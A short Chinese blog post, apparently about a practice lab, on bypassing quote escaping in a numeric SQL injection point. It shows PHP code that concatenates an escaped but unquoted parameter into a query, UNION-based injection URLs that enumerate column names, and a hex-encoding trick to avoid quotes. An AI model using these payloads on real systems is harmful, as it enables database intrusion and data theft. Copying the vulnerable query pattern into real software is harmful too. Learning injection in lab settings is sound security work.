SQL注入引号转义绕过

问题描述做了一个靶场，注入点为数字类型，一开始一帆风顺，直到爆破列名的时候突然报错，页面突然就没了，毫无征兆...报错时的url如下：?id=1 and 1=2 union select column_name,null,null,null,null from information_schema.columns where table_schema=database() and table_na

Da|Sha|Niao

9936人浏览 · 2022-04-25 00:08:53

Da|Sha|Niao · 2022-04-25 00:08:53 发布

问题描述

做了一个靶场，注入点为数字类型，一开始一帆风顺，直到爆破列名的时候突然报错，页面突然就没了，毫无征兆...报错时的url如下：

?id=1 and 1=2 union select column_name,null,null,null,null from information_schema.columns where table_schema=database() and table_name="users"

查看源码：

$sql="SELECT * FROM users where id=";
    $sql.=mysql_real_escape_string($_GET["id"])." ";
    $result=mysql_query($sql);

mysql_real_escape_string() 函数

用来转义 SQL 语句中使用的字符串中的特殊字符。如果成功，则该函数返回被转义的字符串(即在字符前加"\")。如果失败，则返回 false。

受影响的字符：

\x00	\n	\r
\	'	"
\x1a

所以报错是因为 table_name="users" 部分受到了转义字符的影响，变成了table_name=\"users\" ，进而无法识别而报错。所以需要进行引号转义的绕过

解决方法

将 users 转换为16进制

?id=1 and 1=2 union select column_name,null,null,null,null from information_schema.columns where table_schema=database() and table_name = 0x75736 57273

转换工具：

字符串转16进制_16进制转换、十六进制转换_汇享在线工具箱字符串转16进制(十六进制)http://tool.huixiang360.com/str/hex.php